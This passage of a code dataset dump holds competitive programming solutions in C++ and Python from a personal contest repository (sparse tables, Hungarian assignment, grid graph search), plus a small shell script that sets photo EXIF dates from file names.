vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//sparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T)> F;\n F f;\n\n int highestBit(int x) const { return 31 - __builtin_clz(x); }\n\n sparseTable() {}\n\n sparseTable(vector<T>& a, F g)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = highestBit(r - l);\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n, m, k, q);\n cerr << n << \" \" << m << \" \" << k << \" \" << q << endl;\n vector<string> s(n);\n readln(s);\n s.insert(s.begin(), string(m, '.'));\n s.pb(string(m, '.'));\n \n ll sum = 0;\n auto ss = [&]() {\n reverse(all(s));\n k = n - k + 1;\n };\n\n vector<vector<vector<int>>> below(2, vector<vector<int>>(n + 2, vector<int>(m, 0)));\n vector<vector<int>> temps(2, vector<int>(n + 2, 0));\n vector<vector<int>> answers(2, vector<int>(n + 2, m));\n\n auto calcBelow = [&](int order) {\n FOR(i, k + 1, s.size())\n forj(m)\n below[order][k + 1][j] += s[i][j] == 'X';\n ROF(i, k, 0)\n {\n temps[order][i] = k - i;\n forj(m)\n {\n below[order][i][j] = below[order][i + 1][j];\n if (s[i][j] == 'X')\n temps[order][i]++,\n below[order][i][j]++;\n else\n temps[order][i] += below[order][i][j] >= (n - k + 1);\n }\n answers[order][i] = min(answers[order][i + 1], temps[order][i]);\n }\n ss();\n };\n\n calcBelow(0);\n calcBelow(1);\n\n auto get = [&](int r, int c) {\n int fill = s[r][c] == '.' ? 1 : -1;\n s[r][c] ^= 'X' ^ '.';\n\n auto calc = [&](int order) {\n int row = min(k, r);\n\n ROF(i, row, 0)\n {\n if (s[i][c] == '.')\n {\n if (r == i)\n temps[order][i]--;\n else\n temps[order][i] -= below[order][i][c] >= (n - k + 1);\n below[order][i][c] += fill;\n temps[order][i] += below[order][i][c] >= (n - k + 1);\n }\n else\n {\n below[order][i][c] += fill;\n if (r == i)\n temps[order][i]++;\n }\n answers[order][i] = min({m, answers[order][i + 1], temps[order][i]});\n }\n ss();\n r = n - r + 1;\n return answers[order][0];\n };\n\n int ans = calc(0);\n int ans2 = calc(1);\n return min(ans, ans2);\n };\n fori(q)\n {\n if (i % 1000 == 0)\n cerr << i << \"/\" << q << endl;\n ints(r, c); --c;\n int ans = get(r, c);\n //writeln(s);\n //writeln(below[0]);\n //writeln(\"--------------\");\n //writeln(below[1]);\n //writeln(\"--------------\");\n //writeln(temps[0]);\n //writeln(\"--------------\");\n //writeln(temps[1]);\n //writeln(\"--------------\");\n //writeln(answers[0]);\n //writeln(\"--------------\");\n //writeln(answers[1]);\n //writeln(\"--------------\");\n //writeln(ans);\n sum += ans;\n }\n writeln(sum);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \",\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4746067523956299, "alphanum_fraction": 0.49820223450660706, "avg_line_length": 30.338027954101562, "blob_id": "c17de74ad5494dfbc51e25bed438c363fbcc3d51", "content_id": "3e034f6ed0e6e5657a8e41fa6a5dfd60cf132ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4450, "license_type": "no_license", "max_line_length": 174, "num_lines": 142, "path": "/2019/yandexFinal/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int INF = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//hungarian\npair<int, vector<int>> hungarian(vector<vector<int>> const& a)\n{\n int n = a.size() + 1;\n int m = a[0].size() + 1;\n vector<int> u(n), v(m), p(m), way(m);\n fori1(n)\n {\n p[0] = i;\n int j0 = 0;\n vector<int> minv(m, INF);\n vector<bool> used(m, false);\n do \n {\n used[j0] = true;\n int i0 = p[j0];\n int delta = INF;\n int j1;\n forj1(m)\n if (!used[j]) \n {\n int cur = a[i0 - 1][j - 1] - u[i0] - v[j];\n if (cur < minv[j])\n minv[j] = cur,\n way[j] = j0;\n if (minv[j] < delta)\n delta = minv[j],\n j1 = j;\n }\n forj(m)\n if (used[j])\n u[p[j]] += delta,\n v[j] -= delta;\n else\n minv[j] -= delta;\n j0 = j1;\n } \n while (p[j0] != 0);\n do \n {\n int j1 = way[j0];\n p[j0] = p[j1];\n j0 = j1;\n } \n while (j0);\n }\n vector<int> ans(n + 1);\n forj1(m)\n ans[p[j] - 1] = j - 1;\n return {-v[0], ans};\n}\n\n//}}}\n\n\n\nvoid run()\n{\n ints(n);\n vector<tuple<int, int, int>> a(n), b(n);\n fori(n)\n {\n ints(x, y, c);\n a[i] = {x, y, c};\n }\n fori(n)\n {\n ints(x, y, c);\n b[i] = {x, y, c};\n }\n auto get = [&](int i, int j) {\n auto [x1, y1, b1] = a[i];\n auto [x2, y2, b2] = b[j];\n return abs(x2 - x1) + abs(y2 - y1) + abs(b2 - b1);\n };\n vector<vector<int>> m(n, vector<int>(n));\n fori(n) forj(n) m[i][j] = get(i, j);\n auto [price, _] = hungarian(m);\n writeln(price);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4701492488384247, "alphanum_fraction": 0.4776119291782379, "avg_line_length": 21.16666603088379, "blob_id": "f9d95bce7fa66303d5e037352e292341ae685961", "content_id": "40a40b2990e1ef8c2a384567f1b5b007920e62b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/CodeForce/1505/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, m = map(int, input().split())\na = []\nwhile n > 0:\n a.append(n % m)\n n //= m\nprint(\"YES\" if len(set(a)) == len(a) else \"NO\")\n\n" }, { "alpha_fraction": 0.4161115884780884, "alphanum_fraction": 0.43318068981170654, "avg_line_length": 34.32352828979492, "blob_id": "e5e055d9565ad5abbec0ddb37cd58f208b15bc35", "content_id": "987b951e5db579e9a51fd8d2aaff177728598747", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4804, "license_type": "no_license", "max_line_length": 174, "num_lines": 136, "path": "/CodeForce/1335/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<string> colors(n);\n vector<string> field(n);\n readln(colors, field);\n\n vector<int> dx = {-1, 1, 0, 0};\n vector<int> dy = {0, 0, -1, 1};\n map<char, int> directions = {\n {'L', 2},\n {'R', 3},\n {'D', 1},\n {'U', 0}\n };\n int cur = 0;\n int black = 0;\n int ans = 0;\n vector<vector<int>> used(n, vector<int>(m, -1));\n fori(n)\n forj(m)\n if (used[i][j] == -1)\n {\n bool found = false;\n pii cycle;\n int u = i;\n int v = j;\n do {\n used[u][v] = cur;\n int d = directions[field[u][v]];\n u += dx[d];\n v += dy[d];\n } while (used[u][v] != cur);\n cur++;\n int maxLength = 0;\n do {\n used[u][v] = cur;\n int d = directions[field[u][v]];\n u += dx[d];\n v += dy[d];\n maxLength++;\n } while (used[u][v] != cur);\n cur++;\n vector<vector<pii>> levels(maxLength);\n function<void(int, int, int)> dfs = [&](int i, int j, int d) {\n used[i][j] = cur;\n levels[d % maxLength].pb({i, j});\n for (int k = 0; k < 4; ++k)\n {\n int u = i + dx[k];\n int v = j + dy[k];\n if (u < 0 || u >= n || j < 0 || j >= m)\n continue;\n if (u + dx[directions[field[u][v]]] != i || v + dy[directions[field[u][v]]] != j)\n continue;\n if (used[u][v] == cur)\n {\n maxLength = d + 1;\n continue;\n }\n dfs(u, v, d + 1);\n }\n };\n dfs(u, v, 0);\n for (auto& layer: levels)\n {\n ans++;\n bool found = false;\n for (auto& [i, j]: layer)\n if (colors[i][j] == '0')\n {\n black++;\n found = true;\n break;\n }\n }\n cur++;\n }\n writeln(ans, black);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4430992603302002, "alphanum_fraction": 0.48426151275634766, "avg_line_length": 23.294116973876953, "blob_id": "e7c6b9e739d601ebe49aeb336be9c03079a05f8e", "content_id": "68a620197f4f4fae9b2eb8227bf756e6871132e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 88, "num_lines": 34, "path": "/CodeForce/0955/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ext/pb_ds/assoc_container.hpp>\n\nusing namespace std;\nusing namespace __gnu_pbds;\n\ntypedef long long ll;\n\nll sss(ll x)\n{\n ll temp = sqrt(x) - 1;\n while ((temp + 1) * (temp + 1) <= x)\n ++temp;\n return temp;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n ll q, l, r;\n tree<ll, null_type, less<ll>, rb_tree_tag, tree_order_statistics_node_update> s;\n for (ll i = 2; i <= 1000000; ++i)\n for (ll x = i * i; ; x *= i)\n {\n if (ll temp = sss(x); temp * temp != x)\n s.insert(x);\n if (double(x) * i >= 1000000000000000001ll)\n break;\n }\n for (cin >> q; q > 0; --q)\n cin >> l >> r,\n cout << sss(r) - sss(l - 1) + s.order_of_key(r + 1) - s.order_of_key(l) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4960511326789856, "alphanum_fraction": 0.5167356133460999, "avg_line_length": 29.045198440551758, "blob_id": "b10f133286fc40e5c72a52945800cf6bf3d1eb3c", "content_id": "f4de339c9d38d81a7725335425a6a47b6aee4fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5318, "license_type": "no_license", "max_line_length": 165, "num_lines": 177, "path": "/CodeForce/0689/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//segmentTree\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n sparseTable(vector<T>& a, F g, T ne = 0)\n {\n NEITRAL_ELEMENT = ne;\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n, ne));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = logs[++r - l];\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//Igorjan\n\nvoid run()\n{\n ints(n);\n\tvector<int> a(n), b(n);\n\treadln(a, b);\n sparseTable<int> fa(a, [](int x, int y){return max(x, y);}, numeric_limits<int>::min()), fb(b, [](int x, int y){return min(x, y);}, numeric_limits<int>::max());\n ll ans = 0;\n fori(n)\n {\n int m;\n int l1 = i;\n int r1 = n;\n while (r1 - l1 > 1)\n {\n m = (r1 + l1) >> 1;\n (fa.get(i, m) < fb.get(i, m)) ? l1 = m : r1 = m;\n }\n int index1 = l1 + (fa.get(i, l1) < fb.get(i, l1));\n if (index1 == n)\n continue;\n int temp = fa.get(i, index1);//min(n - 1, index1));\n int l2 = index1;\n int r2 = n;\n while (r2 - l2 > 1)\n {\n m = (r2 + l2) >> 1;\n (fa.get(i, m) == temp && fb.get(i, m) == temp) ? l2 = m : r2 = m;\n }\n int index2 = l2 + (fa.get(i, l2) == temp && fb.get(i, l2) == temp);\n ans += index2 - index1;\n //wr(index1, index2);\n //cout.flush();\n }\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.38770899176597595, "alphanum_fraction": 0.41120651364326477, "avg_line_length": 22.294736862182617, "blob_id": "b922ddb2ba4bec6b57509b82bcb94823d615b1fc", "content_id": "5fad7730dae057ff1f901b63a237465dd469445e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 99, "num_lines": 95, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#define INF 1000000007\n\nusing namespace std;\n\nvector< vector<int> > g;\nvector< vector<bool> > used;\nvector<int> t, ans;\nint n, m, k;\nset<int> helpi[2];\nvector< set<int> > helpj[2];\nbool f = false;\n\nvoid dfs(int i, int j, int t)\n{\n if (used[i][j] || g[i][j] <= t)\n return;\n used[i][j] = true;\n helpj[!f][i].insert(j);\n helpi[!f].insert(i);\n if (i > 0)\n dfs(i - 1, j, t);\n if (i < n - 1)\n dfs(i + 1, j, t);\n if (j > 0)\n dfs(i, j - 1, t);\n if (j < m - 1)\n dfs(i, j + 1, t);\n}\n\nvoid run()\n{\n scanf(\"%d %d\\n\", &n, &m);\n g.clear();\n g.resize(n + 1);\n for (int i = 0; i < n; i++)\n {\n helpi[0].insert(i);\n g[i].resize(m + 1);\n for (int j = 0; j < m; j++)\n scanf(\"%d\", &g[i][j]);\n }\n int ttt;\n scanf(\"%d\\n\", &ttt);\n t.clear();\n t.resize(ttt + 1);\n for (int i = 0; i < ttt; i++)\n scanf(\"%d\", &t[i]);\n int c = 0;\n helpj[0].clear();\n helpj[0].resize(n + 1);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n helpj[0][i].insert(j);\n for (int k = 0; k < ttt; k++)\n {\n if (k > 0 && t[k - 1] == t[k])\n {\n printf(\"%d%c\", c, k == ttt - 1 ? '\\n' : ' ');\n continue;\n }\n helpj[!f].clear();\n helpj[!f].resize(n + 1);\n helpi[!f].clear();\n c = 0;\n used.clear();\n used.resize(n + 1);\n for (int i = 0; i < n; i++)\n used[i].resize(m + 1, false);\n for (set<int>::iterator it = helpi[f].begin(); it != helpi[f].end(); it++)\n for (set<int>::iterator it2 = helpj[f][*it].begin(); it2 != helpj[f][*it].end(); it2++)\n if (!used[*it][*it2] && g[*it][*it2] > t[k])\n dfs(*it, *it2, t[k]),\n c++;\n printf(\"%d%c\", c, k == ttt - 1 ? '\\n' : ' ');\n f = !f;\n }\n}\n\nint main()\n{\n // freopen(\"matching.in\", \"r\", stdin);\n // freopen(\"matching.out\", \"w+\", stdout);\n int T;\n scanf(\"%d\\n\", &T);\n for (int TT = 0; TT < T; TT++)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4893617033958435, "alphanum_fraction": 0.563829779624939, "avg_line_length": 22.25, "blob_id": "8995f96686e89e5db16d2e6b00f0d7ab1886d5b6", "content_id": "0de85e7065bd3d256432088c76c0421d2478d79d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/CodeForce/0519/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\na=[sum(map(int,input().split()))for i in[0,1,2]]\nprint(a[0]-a[1])\nprint(a[1]-a[2])\n\n" }, { "alpha_fraction": 0.44427481293678284, "alphanum_fraction": 0.5145038366317749, "avg_line_length": 37.52941131591797, "blob_id": "16066c4f615dc5b9e884a0246fdbbda775de794f", "content_id": "55414dc9f7ba1bd19f12b7617033a679f1bbf0eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 655, "license_type": "no_license", "max_line_length": 99, "num_lines": 17, "path": "/scripts/nameToDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "dateRegex=\"IMG_([0-9][0-9][0-9][0-9])([0-9][0-9])([0-9][0-9])_([0-9][0-9])([0-9][0-9])([0-9][0-9])\"\nshift=\"+0300\"\nfor f in \"$@\"; do\n if [[ ${f} =~ $dateRegex ]]; then\n year=${BASH_REMATCH[1]}\n month=${BASH_REMATCH[2]}\n day=${BASH_REMATCH[3]}\n hour=${BASH_REMATCH[4]}\n minute=${BASH_REMATCH[5]}\n second=${BASH_REMATCH[5]}\n date=\"$year-$month-$day $hour:$minute:$second\"\n echo \"Date found $f $date\"\n exiv2 -v -M\"set Exif.Image.DateTime $date\" $f 1>/dev/null 2>&1\n exiv2 -v -M\"set Exif.Image.DateTimeOriginal $date\" $f 1>/dev/null 2>&1\n touch -d \"$date $shift\" \"$f\"\n fi\ndone\n" }, { "alpha_fraction": 0.3639240562915802, "alphanum_fraction": 0.3892405033111572, "avg_line_length": 18.15151596069336, "blob_id": "fa0fed0b77bb1da30b21260a54007946a04812db", "content_id": "df8085774714f055355beceaf8ddc06e1a8e9a9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 632, "license_type": "no_license", "max_line_length": 39, "num_lines": 33, "path": "/2013/2013yandex/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n\nusing namespace std;\n\nstring a, s = \"0000\";\n\nint findd(int k, char c) {\n for (int i = k; i < 8; i++)\n if (a[i] == c)\n return i;\n return -1;\n}\n\nint main() {\n freopen(\"number.in\", \"r\", stdin);\n freopen(\"number.out\", \"w\", stdout);\n cin >> a;\n int k = 0, prev = 0;\n for (int i = 0; i < 4; i++) {\n while (findd(k, s[i]) == -1)\n s[i]++;\n prev = k;\n k = findd(k, s[i]) + 1;\n if (8 - k + 1 < 4 - i) {\n s[i--]++;\n k = prev;\n continue;\n }\n }\n cout << s << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 16.5, "blob_id": "3d532a3c3762edb8529c467f1b1a131b1628e7a4", "content_id": "9f5efebb9c0f80e4a8e76b4661bf559d7e52610d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/CodeForce/1505/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "x = int(input())\nprint(2 - x ** 2)\n" }, { "alpha_fraction": 0.434883713722229, "alphanum_fraction": 0.4441860318183899, "avg_line_length": 19.5, "blob_id": "ce4f2568b16396b0c95b5cb5042859e799f0faa1", "content_id": "c121288a5403e31a3d43f9af6a3585c7874017c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 430, "license_type": "no_license", "max_line_length": 47, "num_lines": 20, "path": "/CodeForce/0675/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\nint main()\r\n{\r\n int n, ans = 0;\r\n scanf(\"%d\", &n);\r\n\tvector<long long> a(n), b(n, 0);\r\n for (int i = 0; i < n; ++i)\r\n scanf(\"%lld\", &a[i]);\r\n partial_sum(a.begin(), a.end(), b.begin());\r\n map<long long, int> x;\r\n for (auto y : b)\r\n x[y]++;\r\n for (auto y : x)\r\n ans = max(ans, y.second);\r\n printf(\"%d\\n\", n - ans);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.42753443121910095, "alphanum_fraction": 0.4453066289424896, "avg_line_length": 26.269624710083008, "blob_id": "cedf8405a783a4784f808f1f2d9503934064b00a", "content_id": "8ce9cc823f48e8148fd375f7cf9f325ad46d62f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7990, "license_type": "no_license", 